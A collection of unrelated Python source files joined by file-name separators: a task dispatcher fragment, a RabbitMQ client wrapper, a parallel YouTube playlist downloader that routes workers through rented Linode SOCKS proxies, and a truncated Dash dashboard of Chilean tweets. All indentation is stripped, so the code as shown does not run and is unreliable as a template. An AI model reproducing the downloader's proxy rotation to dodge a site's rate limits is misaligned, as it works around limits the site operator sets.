q.send_raw(response.as_dispatcher_response())
elif msg['type'] == 'finalize':
store.finalize_submission(
msg['sid'], msg['classification'],
msg['errors'], msg['results'], msg['score']
)
completed_queue = msg['completed_queue']
if completed_queue:
cq = queue.get(completed_queue, None)
if not cq:
cq = NamedQueue(completed_queue)
queue[completed_queue] = cq
cq.push(msg['raw'])
# Send complete message to any watchers.
for w in msg['watchers'].itervalues():
w.push({'status': 'STOP'})
else:
log.warning("Unhandled message type: %s",
msg.get('type', '<unknown>'))
except riak.RiakError:
msg['retries'] = retries = msg.get('retries', 0) + 1
if retries > 5:
log.exception("Max retries exceeded")
continue
self.storage_queue.push(msg)
log.exception("Problem doing %s", msg.get('type', 'unknown'))
except Exception: # pylint:disable=W0702
log.exception('Problem in writer')
# TODO: Should we sleep for a bit here to avoid flailing?
store.close()
def explain_state(self, task):
log.info('Got explain_state message.')
nq = NamedQueue(task.watch_queue)
submission = self.entries.get(task.sid, None)
if submission:
has_timeout = False
for v in self.ack_timeout.itervalues():
for t in v:
if t.sid == task.sid:
has_timeout = True
for v in self.service_timeout.itervalues():
for t in v:
if t.sid == task.sid:
has_timeout = True
if not has_timeout:
nq.push({
'srl': 0,
'message': 'No timeouts for this submission!',
'depth': 0,
})
for entry in submission.itervalues():
if not entry.task.psrl:
explain(entry, nq)
nq.push(False)
def get_system_time(self, task):
nq = NamedQueue(task.watch_queue)
nq.push({'time': time.time()})
def list_service_info(self, task):
NamedQueue(task.watch_queue).push(self._service_info())
def outstanding_services(self, task):
nq = NamedQueue(task.watch_queue)
outstanding = {}
submission = self.entries.get(task.sid, None)
if submission:
for entry in submission.itervalues():
get_outstanding_services(entry, outstanding)
nq.push(outstanding)
def outstanding_submissions(self, task):
nq = NamedQueue(task.watch_queue)
nq.push({'sids': self.entries.keys()})
def get_outstanding_services(entry, outstanding):
o = entry.outstanding_services
d = entry.dispatched_services
a = entry.acknowledged_services
stage = entry.task.stage
if stage == DONE:
return
for name in o[stage].keys() + d[stage].keys() + a[stage].keys():
outstanding[name] = outstanding.get(name, 0) + 1
for child in entry.outstanding_children.itervalues():
get_outstanding_services(child, outstanding)
def explain(entry, nq, depth=0):
outstanding_services = entry.outstanding_services
dispatched_services = entry.dispatched_services
acknowledged_services = entry.acknowledged_services
stage = entry.task.stage
if stage != DONE:
nq.push({
'srl': entry.task.srl,
'message': 'Stage: ' + str(stage),
'depth': depth,
})
if outstanding_services[stage]:
nq.push({
'srl': entry.task.srl,
'message': 'Undispatched: ' + \
','.join([x for x in outstanding_services[stage]]),
'depth': depth,
})
elif dispatched_services[stage]:
nq.push({
'srl': entry.task.srl,
'message': 'Awaiting acks for: ' + \
','.join([x for x in dispatched_services[stage]]),
'depth': depth,
})
elif acknowledged_services[stage]:
nq.push({
'srl': entry.task.srl,
'message': 'Awaiting results for: ' + \
','.join([x for x in acknowledged_services[stage]]),
'depth': depth,
})
for csrl in entry.extracted_children:
child = entry.dispatcher.entries[entry.task.sid].get(csrl, None)
if not child:
nq.push({
'srl': entry.task.srl,
'message': 'Extracted child %s not found' % csrl,
'depth': depth,
})
else:
nq.push({
'srl': entry.task.srl,
'message': 'Extracted child: ',
'depth': depth,
})
explain(child, nq, depth+1)
for child in entry.outstanding_children.itervalues():
nq.push({
'srl': entry.task.srl,
'message': 'Outstanding child: ',
'depth': depth,
})
explain(child, nq, depth+1)
class DispatchClient(object):
@classmethod
def _send_control_queue_call(cls, shard, state, **kw):
name = reply_queue_name(state)
kw.update({
'state': state,
'watch_queue': name,
})
t = Task({}, **kw)
forge.get_control_queue('control-queue-' + str(shard)).push(t.raw)
nq = NamedQueue(name)
return nq.pop(timeout=5)
@classmethod
def get_system_time(cls, shard='0'):
result = cls._send_control_queue_call(shard, 'get_system_time')
return result.get('time', None) if result else None
@classmethod
def list_service_info(cls, shard='0'):
result = cls._send_control_queue_call(shard, 'list_service_info')
#return result.get('services', None) if result else None
return result
@classmethod
def get_outstanding_services(cls, sid):
shard = forge.determine_dispatcher(sid)
result = cls._send_control_queue_call(shard, 'outstanding_services', sid=sid)
return result
@classmethod
def list_outstanding(cls, shard='0'):
result = cls._send_control_queue_call(shard, 'outstanding_submissions')
return result.get('sids', None) if result else None
|
amqp.py
|
# --coding:utf-8--
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import time
import ssl
import threading
import amqpstorm
import json
import datetime
from amqpstorm import Message
class AMQPConn(object):
def __init__(self, host, username, password, routing, lock, tls_config=None):
"""
:param host: RabbitMQ Server e.g. 127.0.0.1
:param username: RabbitMQ Username e.g. guest
:param password: RabbitMQ Password e.g. guest
:return:
"""
# TBD to support SSL
self.host = host
self.username = username
self.password = password
self.connection = None
self.channel = None
self.resp_queue = None
self.response = None
self.correlation_id = None
self.on_request = routing
self.thread_main = None
self.request_callback = None
self.notif_callback = None
self.tls_config = tls_config
self.use_ssl = False
if self.tls_config:
if self.tls_config.get('tls', None):
self.use_ssl = True
self.lock = lock
self._stopped = threading.Event()
self.setup()
def _on_request(self, message):
json_in = json.loads(message.body)
# print(json_str)
if message.reply_to:
if self.request_callback:
result = self.request_callback(json_in)
properties = {
'correlation_id': message.correlation_id
}
response = Message.create(
message.channel, json.dumps(
result, ensure_ascii=False), properties)
response.content_type = 'application/json'
response.publish(message.reply_to)
else:
if self.notif_callback:
self.notif_callback(json_in)
message.ack()
def _on_response(self, message):
if self.correlation_id != message.correlation_id:
return
self.response = message.body
def setup(self):
if self.use_ssl:
self.connection = amqpstorm.Connection(
self.host,
self.username,
self.password,
port=5671,
ssl=True,
ssl_options={
'ssl_version': ssl.PROTOCOL_TLSv1_2,
'cert_reqs': ssl.CERT_REQUIRED,
'keyfile': self.tls_config.get('keyfile'),
'certfile': self.tls_config.get('cerfile'),
'ca_certs': self.tls_config.get('cafile'),
}
)
else:
self.connection = amqpstorm.Connection(self.host,
self.username,
self.password)
self.channel = self.connection.channel()
result = self.channel.queue.declare(exclusive=True)
self.resp_queue = result['queue']
self.channel.basic.consume(self._on_response, no_ack=True,
queue=self.resp_queue)
self.channel.queue.declare(queue=self.on_request)
self.channel.queue.purge(queue=self.on_request)
self.channel.basic.qos(prefetch_count=100)
self.channel.basic.consume(self._on_request, queue=self.on_request)
def request(self, routing_key, req_json, timeout=0):
self.lock.acquire()
self.response = None
message = Message.create(
self.channel, body=json.dumps(
req_json, ensure_ascii=False))
message.reply_to = self.resp_queue
message.content_type = 'application/json'
self.correlation_id = message.correlation_id
message.publish(routing_key=routing_key)
start = datetime.datetime.now()
while not self.response:
self.channel.process_data_events()
time.sleep(0.01)
now = datetime.datetime.now()
if timeout > 0 and (now - start) >= datetime.timedelta(0, timeout):
break
response = self.response
self.lock.release()
return response
def publish(self, routing_key, req_json):
message = Message.create(
self.channel, body=json.dumps(
req_json, ensure_ascii=False))
message.content_type = 'application/json'
message.publish(routing_key=routing_key)
def start(self, daemon):
self._stopped.clear()
if daemon is True:
self.thread_main = threading.Thread(
target=self._thread_main, args=(None,))
self.thread_main.setDaemon(True)
self.thread_main.start()
else:
self.channel.start_consuming()
def stop(self):
self._stopped.set()
self.channel.stop_consuming()
if self.thread_main:
self.thread_main.join()
self.channel.close()
self.connection.close()
def set_callback(self, request_callback, notif_callback):
self.request_callback = request_callback
self.notif_callback = notif_callback
def _thread_main(self, *args, **kwargs):
need_reconnect = False
while self._stopped.is_set() is not True:
try:
self.channel.start_consuming()
except amqpstorm.AMQPError:
if self._stopped.is_set() is True:
break
need_reconnect = True
pass
if need_reconnect is True:
self.channel.stop_consuming()
self.channel.close()
self.channel = None
self.connection.close()
self.connection = None
while True:
try:
self.setup()
break
except BaseException:
time.sleep(1)
need_reconnect = False
|
downloader.py
|
"""
Fancy parallel downloader for a pre-
retrieved YoutubeDL() info_dict JSON.
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣠⣤⣤⣄⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠤⠖⠊⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠙⠲⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡤⠊⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⡜⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢢⠀⠀⠀⠀⠀⢳⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣸⠁⠀⠀⠀⠀⠀⠀⠀⠱⡀⠀⠀⠀⠀⠀⠀⠀⡀⠈⠀⡀⠀⠀⠀⠈⡇⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡏⠀⠀⠀⠀⠀⠀⠀⠀⡰⠁⠀⠀⠀⠀⠀⠀⠀⠘⡆⡜⠁⠀⠀⠀⠀⢧⡀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠸⡀⠀⠀⠀⠀⠀⣀⣤⡂⠀⠇⠱⠀⡀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢇⠀⠀⠀⠀⠀⠀⠀⠀⠈⢄⡀⢠⣟⢭⣥⣤⠽⡆⠀⡶⣊⣉⣲⣤⢀⡞⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⡀⠀⠐⠂⠘⠄⣈⣙⡡⡴⠀⠀⠙⣄⠙⣛⠜⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠈⢦⡀⠀⠀⠀⢸⠁⠀⠀⠀⠀⠀⠀⠄⠊⠀⠀⠀⠀⡸⠛⠀⠀⠀⢸⠆⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠈⠓⠦⢄⣘⣄⠀⠀⠀⠀⠀⠀⠀⡠⠀⠀⠀⠀⣇⡀⠀⠀⣠⠎⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠁⠈⡟⠒⠲⣄⠀⠀⡰⠇⠖⢄⠀⠀⡹⡇⢀⠎⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡇⠀⠀⡇⠀⠀⠹⠀⡞⠀⠀⢀⠤⣍⠭⡀⢱⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣀⣀⣠⠞⠀⠀⢠⡇⠀⠀⠀⠀⠁⠀⢴⠥⠤⠦⠦⡼⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣀⣤⣴⣶⣿⣿⡟⠁⠀⠋⠀⠀⠀⢸⠁⠀⠀⠀⠀⠀⠀⠀⠑⣠⢤⠐⠁⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⢸⡀⠀⠀⠀⠀⠀⠀⠀⠀⠬⠥⣄⠀⠀⠈⠲⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠙⠦⣄⠀⠀⠀⠀⠀⠀⠀⠀⠈⢳⠀⠀⢀⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠒⠦⠤⢤⣄⣀⣠⠤⢿⣶⣶⣿⣿⣿⣶⣤⡀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡼⠁⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣦⣤⣤⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀
NOTE: Not my fault if your IP gets rate-
limited or throttled by YouTube. With
great power comes great responsibility!
ALSO NOTE: Have yet to test on other
video sites besides YouTube...
"""
import argparse
import json as j
from multiprocessing import cpu_count, Process, Queue
from multiprocessing.queues import Empty, Full
import os
from random import randint
from time import sleep
import typing
from yt_dlp import YoutubeDL
from yt_dlp.utils import encodeFilename, sanitize_path
from yt_dlp.extractor.common import InfoExtractor as IE
from .linode import LinodeProxy
from .proxy import Proxy
from .socks import SocksProxy
from .util import die, eprint, runcmd
def do_download(
entry_q: Queue,
opts: argparse.Namespace,
sub_langs: [str],
proxy: Proxy = None,
):
sub_opts = {
"writesubtitles": True,
"writeautomaticsub": True,
}
if sub_langs[0] == "all":
sub_opts["allsubtitles"] = True
else:
sub_opts["subtitleslangs"] = sub_langs
yt_opts = {
"noprogress": True,
"http_chunk_size": 10485760,
"writethumbnail": True,
"ignoreerrors": True,
"format_sort": IE.FormatSort.ytdl_default,
"extractor_args": {
"youtube": {"player_skip": ["webpage"]},
"youtubetab": {"skip": ["webpage"]},
},
}
if proxy is not None:
yt_opts["proxy"] = proxy.proxy_url
if opts.all_thumbnails:
yt_opts["write_all_thumbnails"] = True
y = YoutubeDL({**yt_opts, **sub_opts})
y_nosubs = YoutubeDL(yt_opts)
while True:
try:
try:
entry = entry_q.get(block=True, timeout=0.5)
except Empty:
break
try:
id_dir = entry["id"]
except TypeError:
continue
try:
os.mkdir(id_dir)
except FileExistsError:
pass
try:
os.chdir(id_dir)
except OSError as oserr:
eprint("[WARN]: Skipping {} due to {}".format(id_dir, oserr))
continue
nfo_path = "playlist_entry.json"
if not (os.path.exists(nfo_path) and os.path.isfile(nfo_path)):
nfo_file = open(nfo_path, mode="w")
nfo_file.write(j.dumps(entry, sort_keys=True, indent=2))
nfo_file.close()
desc_path = "description"
if not (os.path.exists(desc_path) and os.path.isfile(desc_path)):
desc_file = open(desc_path, mode="w")
desc_file.write(entry["description"])
desc_file.close()
dl_url = "https://www.youtube.com/watch?v=" + entry["id"]
try:
if entry["tux_get_subs"] is True:
y.download([dl_url])
else:
y_nosubs.download([dl_url])
except KeyError:
y.download([dl_url])
os.chdir("..")
sleep(2)
except KeyboardInterrupt:
break
if proxy is not None:
if proxy.exclusive:
print(
"[INFO]: Cleaning up worker {}'s exclusive proxy".format(
os.getpid()
)
)
proxy.cleanup()
print("[INFO]: Worker {} done...".format(os.getpid()))
def get_entries(entries: dict, entry_q: Queue):
try:
for entry in entries:
while True:
try:
entry_q.put(entry, block=True, timeout=0.2)
break
except Full:
pass
except KeyboardInterrupt:
pass
entry_q.close()
def check_subs_done(entry: dict, basename: str, langs: [str] = None) -> bool:
if langs is None:
langs = entry["automatic_captions"].keys()
for lang in langs:
subbase = basename + "." + lang
lang_sub_exists = False
for subentry in entry["automatic_captions"][lang]:
sfname = subbase + "." + subentry["ext"]
if os.path.exists(sfname) and os.path.isfile(sfname):
lang_sub_exists = True
break
if not lang_sub_exists:
return False
return True
def check_video_done(entry: dict, basename: str) -> bool:
for ext in (".mp4", ".webm", ".mkv"):
vfname = basename + ext
if os.path.exists(vfname) and os.path.isfile(vfname):
return True
return False
def check_dl(in_q: Queue, out_q: Queue):
while True:
try:
try:
entry = in_q.get(block=True, timeout=0.5)
except Empty:
break
try:
id_dir = entry["id"]
except TypeError:
continue
if os.path.isdir(id_dir):
try:
os.chdir(id_dir)
except OSError as oserr:
eprint(
"[WARN]: Skipping {} due to {}".format(id_dir, oserr)
)
continue
elif os.path.exists(id_dir):
eprint(
"[WARN]: Not downloading https://youtube.com/watch?v={} "
+ "because {} exists and is not a directory!"
)
continue
else:
out_q.put(entry)
continue
nfo_path = "playlist_entry.json"
if not (os.path.exists(nfo_path) and os.path.isfile(nfo_path)):
os.chdir("..")
out_q.put(entry)
continue
desc_path = "description"
if not (os.path.exists(desc_path) and os.path.isfile(desc_path)):
desc_file = open(desc_path, mode="w")
desc_file.write(entry["description"])
desc_file.close()
y = YoutubeDL({"ignoreerrors": True})
basename = os.path.splitext(
sanitize_path(encodeFilename(y.prepare_filename(entry)))
)[0]
try:
if check_subs_done(entry, basename):
entry["tux_get_subs"] = False
else:
entry["tux_get_subs"] = True
except KeyError:
eprint(
"[WARN]: Couldn't find auto subs for {} in info".format(
entry["id"]
)
)
entry["tux_get_subs"] = False
if not (check_video_done(entry, basename)):
out_q.put(entry)
os.chdir("..")
continue
os.chdir("..")
except KeyboardInterrupt:
break
def testworker(in_q: Queue):
i = 0
while not in_q.empty():
try:
entry = in_q.get(block=True, timeout=0.5)
except Empty:
break
try:
i += 1
print("{}: ".format(i), end="")
print(entry["id"])
acs = entry["automatic_captions"]
except KeyError:
eprint("couldn't get caps on vid {}".format(entry["id"]))
def workers_alive(workers: [Process]):
for worker in workers:
if worker.is_alive():
return True
return False
def resume_cleanup(workers: [Process], q_worker: Process):
print("\n[CLEANUP]: Cleaning up...")
for worker in workers:
if worker.is_alive():
print("[CLEANUP]: Terminating resume worker {}".format(worker.pid))
worker.terminate()
print("[CLEANUP]: Terminating queue worker {}".format(worker.pid))
q_worker.terminate()
def resume_preprocess(entries: [dict]) -> list:
ncpus = cpu_count()
n_workers = ncpus if len(entries) >= ncpus else len(entries)
in_q = Queue(n_workers)
out_q = Queue(len(entries))
iq_builder = Process(target=get_entries, args=(entries, in_q))
workers = []
try:
iq_builder.start()
for n in range(n_workers):
workers.append(Process(target=check_dl, args=(in_q, out_q)))
while not in_q.full():
sleep(0.2)
for w in workers:
w.start()
unfinished_entries = []
while workers_alive(workers):
try:
unfinished_entries.append(out_q.get(block=True, timeout=2))
except Empty:
continue
except KeyboardInterrupt:
resume_cleanup(workers, iq_builder)
return []
if iq_builder.is_alive():
iq_builder.terminate()
die("[BUG]: Workers didn't verify whole list! Exiting...")
return unfinished_entries
def validate_linode_proxy(proxy: LinodeProxy) -> LinodeProxy:
if not proxy.start():
eprint(
"[WARN]: "
+ "Proxy, validation failed, deleting and rebuilding Linode..."
)
port = proxy.proxy_port
proxy.cleanup()
proxy = LinodeProxy(proxy_port=port)
return validate_linode_proxy(proxy)
else:
print(
"[INFO]: SOCKS validation succeeded on port {} from ID {}".format(
proxy.proxy_port, proxy.info["id"]
)
)
return proxy
def cleanup(workers: [Process], linode_proxies: [LinodeProxy]) -> None:
if len(workers) > 0:
for worker in workers:
if worker.is_alive():
print(
"[CLEANUP]: Terminating download worker {}".format(
worker.pid
)
)
worker.terminate()
if len(linode_proxies) > 0:
print("[CLEANUP]: Deleting Linode proxies...")
for proxy in linode_proxies:
proxy.cleanup()
def parse_args(args: list, name: str):
parser = argparse.ArgumentParser(prog=name)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
"-L",
"--linode-proxy",
action="store_true",
help="Give each worker a Linode SOCKS proxy. Assumes you have already "
+ "setup the linode-cli with an API key and default settings. See "
+ "https://www.linode.com/docs/guides/linode-cli/ "
+ "for more information.",
)
group.add_argument(
"-S",
"--socks-proxy",
type=str,
default=None,
help="Run workers through a SOCKS proxy. Requires a fully-qualified "
+ 'proxy URL (e.g. "socks5://user:pass@hostname:port" or '
+ '"socks5://hostname:port").\n'
+ "Be mindful of your shell's history file when entering passwords on "
+ "the command line. If this script encounters a proxy that requires "
+ "authentication, it will prompt the user for a password "
+ "interactively, as well.",
)
parser.add_argument(
"-p",
"--proxy-base-port",
type=int,
default=1337,
help="Port number that local Linode-powered proxy ports are derived "
+ "from, does nothing without "
+ "enabling --linode-proxy (aka. -L).",
)
parser.add_argument(
"--resume-dump",
action="store_true",
help="Dump resume info_dict to JSON (for debugging).",
)
parser.add_argument(
"-n",
"--n-workers",
type=int,
default=8,
help="Number of parallel download workers",
)
parser.add_argument(
"-l",
"--subtitle-langs",
type=str,
default="en",
help="Comma-delimited list of subtitle languages to download; "
+ 'pass "all" to download all auto captions. '
+ 'Downloads "en" subtitles by default.',
)
parser.add_argument(
"-T",
"--all-thumbnails",
action="store_true",
help="Download all thumbnails instead of just the best one.",
)
parser.add_argument(
"playlist_json",
type=argparse.FileType("r"),
help="JSON-ified playlist file to download",
)
return parser.parse_args(args=args)
def main(args: [str], name: str) -> int:
opts = parse_args(args=args, name=name)
sub_langs = opts.subtitle_langs.split(",")
n_workers = opts.n_workers
key_path = os.path.abspath("./proxy_key")
pubkey_path = os.path.abspath(key_path + ".pub")
if not (
os.path.isfile(pubkey_path)
or os.path.isfile(os.path.splitext(pubkey_path)[0])
):
print("[INFO]: Creating SSH key for Linode proxying...")
print(runcmd('ssh-keygen -f "{}" -N ""'.format(key_path)).decode())
info_dict = j.loads(opts.playlist_json.read())
opts.playlist_json.close()
print("[INFO]: Starting squid-dl...")
dirname = info_dict["title"]
print('[INFO]: saving videos to "{}" directory'.format(dirname))
if not (os.path.exists(dirname) and os.path.isdir(dirname)):
os.mkdir(dirname)
else:
playlist_size = len(info_dict["entries"])
info_dict["entries"] = resume_preprocess(info_dict["entries"])
if len(info_dict["entries"]) == 0:
print("[WARN]: Nothing left to download, exiting...")
return 1
print(
"Resuming download of {}/{} videos...".format(
len(info_dict["entries"]), playlist_size
)
)
if opts.resume_dump:
rdump = open(info_dict["title"] + ".resume.json", mode="w")
rdump.write(j.dumps(info_dict, sort_keys=True, indent=2))
rdump.close()
n_entries = len(info_dict["entries"])
n_workers = n_workers if n_workers < n_entries else n_entries
entry_q = Queue(n_workers)
entry_getter = Process(
target=get_entries, args=(info_dict["entries"], entry_q)
)
entry_getter.start()
base_port = 1337
workers = []
linode_proxies = []
if opts.socks_proxy is not None:
socks_proxy = SocksProxy(url=opts.socks_proxy)
try:
for n in range(n_workers):
port = base_port + n
if opts.linode_proxy:
linode_proxies.append(
LinodeProxy(proxy_port=port, pubkey_path=pubkey_path)
)
worker_args = (entry_q, opts, sub_langs, linode_proxies[n])
elif opts.socks_proxy is not None:
worker_args = (entry_q, opts, sub_langs, socks_proxy)
else:
worker_args = (entry_q, opts, sub_langs)
workers.append(
Process(
target=do_download,
args=worker_args,
)
)
if len(linode_proxies) > 0:
if not (
os.path.isfile(pubkey_path)
or os.path.isfile(os.path.splitext(pubkey_path)[0])
):
die(
'[ERROR]: SSH key file "{}" does not exist!'.format(
pubkey_path
)
)
print("[INFO]: Waiting for Linodes to come online", end="")
nodes_to_ping = list(range(n_workers))
while len(nodes_to_ping) > 0:
print(".", end="")
temp_list = []
for proxy_idx in nodes_to_ping:
if linode_proxies[proxy_idx].get_status() != "running":
temp_list.append(proxy_idx)
sleep(0.2)
nodes_to_ping = temp_list
print()
while not entry_q.full():
sleep(0.2)
os.chdir(dirname)
for i in range(n_workers):
if len(linode_proxies) > 0:
linode_proxies[i] = validate_linode_proxy(linode_proxies[i])
seconds = randint(0, 1)
else:
seconds = randint(1, 6)
workers[i].start()
sleep(seconds)
while workers_alive(workers):
sleep(0.2)
except KeyboardInterrupt:
eprint("\n[CLEANUP]: Interrupted, cleaning up...")
cleanup(workers, linode_proxies)
if entry_getter.is_alive():
print(
"[CLEANUP]: Terminating queue worker {}".format(
entry_getter.pid
)
)
entry_getter.terminate()
return 1
print("[INFO]: All done!")
cleanup(workers, linode_proxies)
return 0
|
app.py
|
import warnings
import dash
import dash_core_components as dcc
import dash_html_components as html
warnings.filterwarnings('ignore')
from dash.dependencies import Input, Output
from multiprocessing import Process, Queue
from utils import read_mongo, json_pandas
from main import get_keywords
from utils_app import get_tpm, create_graph, create_wc, get_username_list, create_wc2
from npl_utils import init_counter, process
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# global variables
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
dir_noticias = 'data/Noticieros Twitter.csv'
dir_politicos = 'data/Politicos-Twitter.csv'
keywords = get_keywords()[:50]
noticieros = get_username_list(dir_noticias)
politicos = get_username_list(dir_politicos)
time_interval = 30 # seconds
# dataframe with starting database
df = json_pandas(
read_mongo('dbTweets', 'tweets_chile',
query_fields={"dateTweet": 1, "tweet": 1, "screenName": 1},
json_only=True, num_limit=10 ** 5)
)
twiterator = map(process, df['tweet'])
word_counter = init_counter(twiterator)
tpm_chile = get_tpm(df.copy(), keywords)
datetime_chile = tpm_chile['All'].index.max()
graph_chile = create_graph(tpm_chile, keywords[:9])
#wc_chile = create_wc(tpm_chile, keywords)
wc_chile = create_wc2(word_counter)
q_chile = Queue()
tpm_prensa = get_tpm(df.loc[df['screenName'].isin(noticieros)].copy(), keywords)
datetime_prensa = tpm_prensa['All'].index.max()
graph_prensa = create_graph(tpm_prensa, keywords[:9])
wc_prensa = create_wc(tpm_prensa, keywords)
q_prensa = Queue()
tpm_politicos = get_tpm(df.loc[df['screenName'].isin(politicos)].copy(), keywords)
datetime_politicos = tpm_politicos['All'].index.max()
graph_politicos = create_graph(tpm_politicos, keywords[:9])
wc_politicos = create_wc(tpm_politicos, keywords)
q_politicos = Queue()
max_length = 100 # maximum number of points to plot
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# layout
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
fig_tpm_chile = dcc.Graph(figure=graph_chile, id='plot-tweets-chile')
fig_tpm_prensa = dcc.Graph(figure=graph_prensa, id='plot-tweets-prensa')
fig_tpm_politicos = dcc.Graph(figure=graph_politicos, id='plot-tweets-politicos')
fig_wc_chile = dcc.Graph(figure=wc_chile, id='word-cloud-chile')
fig_wc_prensa = dcc.Graph(figure=wc_prensa, id='word-cloud-prensa')
fig_wc_politicos = dcc.Graph(figure=wc_politicos, id='word-cloud-politicos')
# Dash object
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
server = app.server
# CACHE_CONFIG = {
# 'CACHE_TYPE': 'filesystem',
# 'CACHE_DIR': 'cache-directory'
# }
# cache = Cache()
# cache.init_app(app.server, config=CACHE_CONFIG)
# layout for Dash object
app.layout = html.Div([
# ======== PRESENTACION PAGINA ======== #
html.H1(children='¡Bienvenid@ al DashBoard del CeMAS!', style={'textAlign': 'center'}),
html.H5(children='''
En esta página usted tiene acceso a distintas visualizaciones referentes a la situación
actual de Chile.
''', style={'textAlign': 'center'}),
html.H6(children="El objetivo es que la ciudadanía tenga un fácil acceso a lo que estan diciendo los actores "
"políticos, los medios de comunicación y la ciudadanía",
style={'textAlign': 'center'}),
# ======== TABS PRENSA, CHILE, POLITICOS ======== #
dcc.Tabs(id='tabs-graphs', value='tab-chile', children=[
dcc.Tab(label='Prensa', id='graphs-prensa', value='tab-prensa', children=html.Div([
html.H6(
children="Los distintos medios de comunicación chilenos utilizan Twitter. En tiempo real, se puede "
"ver la cantidad de Tweets realizadas por la prensa:",
style={'textAlign': 'center'}),
html.Div(fig_tpm_prensa, style={'textAlign': 'center'}),
html.H6("En donde las palabras que más usadas en sus tweets son:",
style={'textAlign': 'center'}),
html.Div(fig_wc_prensa, style={'textAlign': 'center', 'display': 'flex', 'justify-content': 'center'})
])
),
dcc.Tab(label='Chile', id='graphs-chile', value='tab-chile', children=html.Div([
html.H6(
children="Los chilenos también usan Twitter. En tiempo real, se puede ver la frecuencia en que la "
"gente utiliza la red social para expresarse:",
style={'textAlign': 'center'}),
html.Div(fig_tpm_chile, style={'textAlign': 'center'}),
html.H6("Las palabras que más usan los usuarios de twitter son:",
style={'textAlign': 'center'}),
html.Div(fig_wc_chile, style={'textAlign': 'center', 'display': 'flex', 'justify-content': 'center'}),
])
),
dcc.Tab(label='Politicos', id='graphs-politicos', value='tab-politicos', children=html.Div([
html.H6(
children="Twitter se ha vuelto una plataforma importante para los políticos de hoy. La frecuencia "
"con la que publican en Twitter es:",
style={'textAlign': 'center'}),
html.Div(fig_tpm_politicos, style={'textAlign': 'center'}),
html.H6("Las palabras que más usan los políticos para expresarse en Twitter son:",
style={'textAlign': 'center'}),
html.Div(fig_wc_politicos, style={'textAlign': 'center', 'display': 'flex', 'justify-content': 'center'}),
])
),
]),
# ======== hidden signal value ======== #
html.Div(id='signal', style={'display': 'none'}),
# ======== time interval ======== #
dcc.Interval(id='interval',
interval=time_interval * 1000, # in milliseconds
n_intervals=0),
])
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# functions
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# @cache.memoize()
# def global_store(num_limit=None):
# """
# Read data from mongo with cache.
# """
# return read_mongo('dbTweets', 'tweets_chile',
# query_fields={"dateTweet": 1, "tweet": 1, "screenName": 1},
# json_only=True, num_limit=num_limit)
def multiprocessing_wc(tpm, kws, queue, test_without_wc=True):
"""
function that enables to create WordCloud in a different process.
"""
queue.put(create_wc(tpm, kws))
def multiprocessing_wc2(counter, queue):
"""
Same as multiprocessing_wc but with the new create_wc that
